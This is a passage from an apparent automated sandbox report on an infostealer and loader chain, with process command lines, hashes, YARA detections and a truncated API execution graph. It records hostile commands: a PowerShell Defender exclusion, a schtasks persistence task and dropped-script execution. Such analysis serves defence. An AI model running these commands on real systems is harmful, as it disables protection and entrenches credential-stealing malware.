                                                                                                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000002.2066610296.00000000022A6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                            • Detection: 83%, ReversingLabs
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:5
                                                                                                                                            Start time:14:39:59
                                                                                                                                            Start date:03/01/2025
                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                                            Imagebase:0x790000
                                                                                                                                            File size:236'544 bytes
                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:6
                                                                                                                                            Start time:14:39:59
                                                                                                                                            Start date:03/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:7
                                                                                                                                            Start time:14:40:00
                                                                                                                                            Start date:03/01/2025
                                                                                                                                            Path:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:175'800 bytes
                                                                                                                                            MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2139671913.0000000027F00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2130466742.0000000025773000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000007.00000002.2099220238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2137347669.0000000026A85000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2145721948.0000000028640000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000002.2099220238.0000000001220000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000001.2063317653.0000000001220000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000003.2066777727.0000000023BE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 3%, ReversingLabs
                                                                                                                                            Reputation:moderate
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:8
                                                                                                                                            Start time:14:40:03
                                                                                                                                            Start date:03/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                                                                                                                                            Imagebase:0xb0000
                                                                                                                                            File size:70'656 bytes
                                                                                                                                            MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                            • Detection: 79%, ReversingLabs
                                                                                                                                            Reputation:moderate
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:9
                                                                                                                                            Start time:14:40:03
                                                                                                                                            Start date:03/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\Microsofts.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\Microsofts.exe"
                                                                                                                                            Imagebase:0xb70000
                                                                                                                                            File size:98'816 bytes
                                                                                                                                            MD5 hash:F6B8018A27BCDBAA35778849B586D31B
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3277651726.0000000002EBF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp, Author: unknown
                                                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: unknown
                                                                                                                                            • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Florian Roth
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                            • Detection: 91%, ReversingLabs
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:10
                                                                                                                                            Start time:14:40:05
                                                                                                                                            Start date:03/01/2025
                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                                                                                                                            Imagebase:0xf70000
                                                                                                                                            File size:433'152 bytes
                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:11
                                                                                                                                            Start time:14:40:05
                                                                                                                                            Start date:03/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:12
                                                                                                                                            Start time:14:40:05
                                                                                                                                            Start date:03/01/2025
                                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 14:45 /du 23:59 /sc daily /ri 1 /f
                                                                                                                                            Imagebase:0xbc0000
                                                                                                                                            File size:187'904 bytes
                                                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:13
                                                                                                                                            Start time:14:40:06
                                                                                                                                            Start date:03/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:14
                                                                                                                                            Start time:14:40:08
                                                                                                                                            Start date:03/01/2025
                                                                                                                                            Path:C:\Users\Public\Libraries\Oupzhkpr.PIF
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\Public\Libraries\Oupzhkpr.PIF"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:1'242'624 bytes
                                                                                                                                            MD5 hash:EE363121466EE051042410AFFFEA28EF
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                            • Detection: 83%, ReversingLabs
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:15
                                                                                                                                            Start time:14:40:08
                                                                                                                                            Start date:03/01/2025
                                                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                            Imagebase:0x7ff6ef0c0000
                                                                                                                                            File size:496'640 bytes
                                                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:16
                                                                                                                                            Start time:14:40:09
                                                                                                                                            Start date:03/01/2025
                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                                            Imagebase:0x790000
                                                                                                                                            File size:236'544 bytes
                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:17
                                                                                                                                            Start time:14:40:09
                                                                                                                                            Start date:03/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:18
                                                                                                                                            Start time:14:40:09
                                                                                                                                            Start date:03/01/2025
                                                                                                                                            Path:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:175'800 bytes
                                                                                                                                            MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000012.00000002.2332577870.000000001D7D3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000012.00000001.2160139244.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000012.00000002.2351778016.00000000200D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000012.00000002.2270156460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000012.00000002.2351518623.000000001FFD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000012.00000003.2168298227.000000001BAB2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000012.00000002.2351220430.000000001EB95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:20
                                                                                                                                            Start time:14:40:17
                                                                                                                                            Start date:03/01/2025
                                                                                                                                            Path:C:\Users\Public\Libraries\Oupzhkpr.PIF
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\Public\Libraries\Oupzhkpr.PIF"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:1'242'624 bytes
                                                                                                                                            MD5 hash:EE363121466EE051042410AFFFEA28EF
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:21
                                                                                                                                            Start time:14:40:18
                                                                                                                                            Start date:03/01/2025
                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                                            Imagebase:0x790000
                                                                                                                                            File size:236'544 bytes
                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:22
                                                                                                                                            Start time:14:40:18
                                                                                                                                            Start date:03/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:23
                                                                                                                                            Start time:14:40:18
                                                                                                                                            Start date:03/01/2025
                                                                                                                                            Path:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:175'800 bytes
                                                                                                                                            MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.2390210005.000000002DE13000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.2390829078.000000002F065000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000017.00000001.2249245726.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.2391691150.0000000030C70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.2390995054.0000000030640000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000017.00000002.2359070635.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000003.2278096725.000000002C1F3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:25
                                                                                                                                            Start time:14:40:47
                                                                                                                                            Start date:03/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                                                                                                                                            Imagebase:0xea0000
                                                                                                                                            File size:665'670'656 bytes
                                                                                                                                            MD5 hash:1EC1BD626F8EA04635D66113E34C4733
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                            Has exited:false

                                                                                                                                            Reset < >

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:15.3%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:30.6%
                                                                                                                                              Total number of Nodes:1623
                                                                                                                                              Total number of Limit Nodes:16
                                                                                                                                              execution_graph 25328 27c1c6c 25329 27c1c7c 25328->25329 25330 27c1d04 25328->25330 25331 27c1c89 25329->25331 25332 27c1cc0 25329->25332 25333 27c1d0d 25330->25333 25334 27c1f58 25330->25334 25336 27c1c94 25331->25336 25376 27c1724 25331->25376 25335 27c1724 10 API calls 25332->25335 25338 27c1d25 25333->25338 25353 27c1e24 25333->25353 25337 27c1fec 25334->25337 25340 27c1fac 25334->25340 25341 27c1f68 25334->25341 25361 27c1cd7 25335->25361 25343 27c1d2c 25338->25343 25344 27c1d48 25338->25344 25348 27c1dfc 25338->25348 25345 27c1fb2 25340->25345 25350 27c1724 10 API calls 25340->25350 25346 27c1724 10 API calls 25341->25346 25342 27c1e7c 25347 27c1724 10 API calls 25342->25347 25352 27c1e95 25342->25352 25349 27c1d9c 25344->25349 25355 27c1d79 Sleep 25344->25355 25351 27c1f82 25346->25351 25354 27c1f2c 25347->25354 25357 27c1724 10 API calls 25348->25357 25356 27c1fc1 25350->25356 25369 27c1a8c 8 API calls 25351->25369 25371 27c1fa7 25351->25371 25353->25342 25353->25352 25358 27c1e55 Sleep 25353->25358 25354->25352 25370 27c1a8c 8 API calls 25354->25370 25355->25349 25359 27c1d91 Sleep 25355->25359 25356->25371 25372 27c1a8c 8 API calls 25356->25372 25365 27c1e05 25357->25365 25358->25342 25362 27c1e6f Sleep 25358->25362 25359->25344 25360 27c1ca1 25367 27c1cb9 25360->25367 25400 27c1a8c 25360->25400 25366 27c1a8c 8 API calls 25361->25366 25368 27c1cfd 25361->25368 25362->25353 25364 27c1e1d 25365->25364 25374 27c1a8c 8 API calls 25365->25374 25366->25368 25369->25371 25373 27c1f50 25370->25373 25375 27c1fe4 25372->25375 25374->25364 25377 27c173c 25376->25377 25378 27c1968 25376->25378 25388 27c17cb Sleep 25377->25388 25391 27c174e 25377->25391 25379 27c1a80 25378->25379 25380 27c1938 25378->25380 25382 27c1a89 25379->25382 25383 27c1684 VirtualAlloc 25379->25383 25384 27c1947 Sleep 25380->25384 25393 27c1986 25380->25393 25381 27c175d 25381->25360 25382->25360 25385 27c16bf 25383->25385 25386 27c16af 25383->25386 25387 27c195d Sleep 25384->25387 25384->25393 25385->25360 25417 27c1644 25386->25417 25387->25380 25388->25391 25392 27c17e4 Sleep 25388->25392 25390 27c182c 25399 27c1838 25390->25399 25423 27c15cc 25390->25423 25391->25381 25391->25390 25394 27c180a Sleep 25391->25394 25392->25377 25395 27c15cc VirtualAlloc 25393->25395 25397 27c19a4 25393->25397 25394->25390 25396 27c1820 Sleep 25394->25396 25395->25397 25396->25391 25397->25360 25399->25360 25401 27c1b6c 25400->25401 25402 27c1aa1 25400->25402 25403 27c16e8 25401->25403 25404 27c1aa7 25401->25404 25402->25404 25405 27c1b13 Sleep 25402->25405 25408 27c1c66 25403->25408 25409 27c1644 2 API calls 25403->25409 25406 27c1b81 25404->25406 25407 27c1ab0 25404->25407 25411 27c1b4b Sleep 25404->25411 25405->25404 25410 27c1b2d Sleep 25405->25410 25415 27c1c00 VirtualFree 25406->25415 25416 27c1ba4 25406->25416 25407->25367 25408->25367 25412 27c16f5 VirtualFree 25409->25412 25410->25402 25411->25406 25413 27c1b61 Sleep 25411->25413 25414 27c170d 25412->25414 25413->25404 25414->25367 25415->25367 25416->25367 25418 27c164d 25417->25418 25419 27c1681 25417->25419 25418->25419 25420 27c164f Sleep 25418->25420 25419->25385 25421 27c1664 25420->25421 25421->25419 25422 27c1668 Sleep 25421->25422 25422->25418 25427 27c1560 25423->25427 25425 27c15d4 VirtualAlloc 25426 27c15eb 25425->25426 25426->25399 25428 27c1500 25427->25428 25428->25425 25429 27ec2fc 25439 27c6518 25429->25439 25433 27ec32a 25444 27ebb50 timeSetEvent 25433->25444 25435 27ec334 25436 27ec342 GetMessageA 25435->25436 25437 27ec336 TranslateMessage DispatchMessageA 25436->25437 25438 27ec352 25436->25438 25437->25436 25440 27c6523 25439->25440 25445 27c4168 25440->25445 25443 27c427c SysAllocStringLen SysFreeString SysReAllocStringLen 25443->25433 25444->25435 25446 27c41ae 25445->25446 25447 27c43b8 25446->25447 25448 27c4227 25446->25448 25451 27c43e9 25447->25451 25452 27c43fa 25447->25452 25459 27c4100 25448->25459 25464 27c432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 25451->25464 25455 27c443f FreeLibrary 25452->25455 25456 27c4463 25452->25456 25454 27c43f3 25454->25452 25455->25452 25457 27c446c 25456->25457 25458 27c4472 ExitProcess 25456->25458 25457->25458 25460 27c4110 25459->25460 25461 27c4143 25459->25461 25460->25461 25462 27c15cc VirtualAlloc 25460->25462 25465 27c5814 25460->25465 25461->25443 25462->25460 25464->25454 25466 27c5824 GetModuleFileNameA 25465->25466 25468 27c5840 25465->25468 25469 27c5a78 GetModuleFileNameA RegOpenKeyExA 25466->25469 25468->25460 25470 27c5afb 25469->25470 25471 27c5abb RegOpenKeyExA 25469->25471 25487 27c58b4 12 API calls 25470->25487 25471->25470 25472 27c5ad9 RegOpenKeyExA 25471->25472 25472->25470 25474 27c5b84 lstrcpynA GetThreadLocale GetLocaleInfoA 25472->25474 25478 27c5c9e 25474->25478 25479 27c5bbb 25474->25479 25475 27c5b20 RegQueryValueExA 25476 27c5b40 RegQueryValueExA 25475->25476 25477 27c5b5e RegCloseKey 25475->25477 25476->25477 25477->25468 25478->25468 25479->25478 25481 27c5bcb lstrlenA 25479->25481 25482 27c5be3 25481->25482 25482->25478 25483 27c5c08 lstrcpynA LoadLibraryExA 25482->25483 25484 27c5c30 25482->25484 25483->25484 25484->25478 25485 27c5c3a lstrcpynA LoadLibraryExA 25484->25485 25485->25478 25486 27c5c6c lstrcpynA LoadLibraryExA 25485->25486 25486->25478 25487->25475 25488 27c4c48 25489 27c4c4c 25488->25489 25490 27c4c6f 25488->25490 25491 27c4c0c 25489->25491 25494 27c4c5f SysReAllocStringLen 25489->25494 25492 27c4c20 25491->25492 25493 27c4c12 SysFreeString 25491->25493 25493->25492 25494->25490 25495 27c4bdc 25494->25495 25496 27c4bf8 25495->25496 25497 27c4be8 SysAllocStringLen 25495->25497 25497->25495 25497->25496 25498 27c4e88 25499 27c4e95 25498->25499 25502 27c4e9c 25498->25502 25507 27c4bdc SysAllocStringLen 25499->25507 25504 27c4bfc 25502->25504 25505 27c4c08 25504->25505 25506 27c4c02 SysFreeString 25504->25506 25506->25505 25507->25502 25508 27ebb44 25511 27dec74 25508->25511 25512 27dec7c 25511->25512 25512->25512 28483 27d870c LoadLibraryW 25512->28483 25514 27dec9e 28488 27c2ee0 QueryPerformanceCounter 25514->28488 25516 27deca3 25517 27decad InetIsOffline 25516->25517 25518 27decc8 25517->25518 25519 27decb7 25517->25519 25520 27c4500 11 API calls 25518->25520 28500 27c4500 25519->28500 25522 27decc6 25520->25522 28491 27c480c 25522->28491 28506 27d80c8 28483->28506 28485 27d8745 28517 27d7d00 28485->28517 28489 27c2eed 28488->28489 28490 27c2ef8 GetTickCount 28488->28490 28489->25516 28490->25516 28492 27c481d 28491->28492 28493 27c485a 28492->28493 28494 27c4843 28492->28494 28496 27c4570 11 API calls 28493->28496 28495 27c4b78 11 API calls 28494->28495 28497 27c4850 28495->28497 28496->28497 28498 27c488b 28497->28498 28499 27c4500 11 API calls 28497->28499 28499->28498 28501 27c4504 28500->28501 28504 27c4514 28500->28504 28503 27c4570 11 API calls 28501->28503 28501->28504 28502 27c4542 28502->25522 28503->28504 28504->28502 28505 27c2c2c 11 API calls 28504->28505 28505->28502 28507 27c4500 11 API calls 28506->28507 28508 27d80ed 28507->28508 28531 27d7914 28508->28531 28512 27d8107 28513 27d810f GetModuleHandleW GetProcAddress GetProcAddress 28512->28513 28514 27d8142 28513->28514 28552 27c44d0 28514->28552 28518 27c4500 11 API calls 28517->28518 28519 27d7d25 28518->28519 28520 27d7914 12 API calls 28519->28520 28521 27d7d32 28520->28521 28522 27c4798 11 API calls 28521->28522 28523 27d7d42 28522->28523 28595 27d8020 28523->28595 28526 27d80c8 15 API calls 28527 27d7d5b NtWriteVirtualMemory 28526->28527 28528 27d7d87 28527->28528 28529 27c44d0 11 API calls 28528->28529 28530 27d7d94 FreeLibrary 28529->28530 28530->25514 28532 27d7925 28531->28532 28556 27c4b78 28532->28556 28534 27d79a1 28537 27c4798 28534->28537 28535 27d7935 28535->28534 28565 27cba44 CharNextA 28535->28565 28538 27c479c 28537->28538 28539 27c47fd 28537->28539 28540 27c47a4 28538->28540 28541 27c4500 28538->28541 28540->28539 28543 27c47b3 28540->28543 28545 27c4500 11 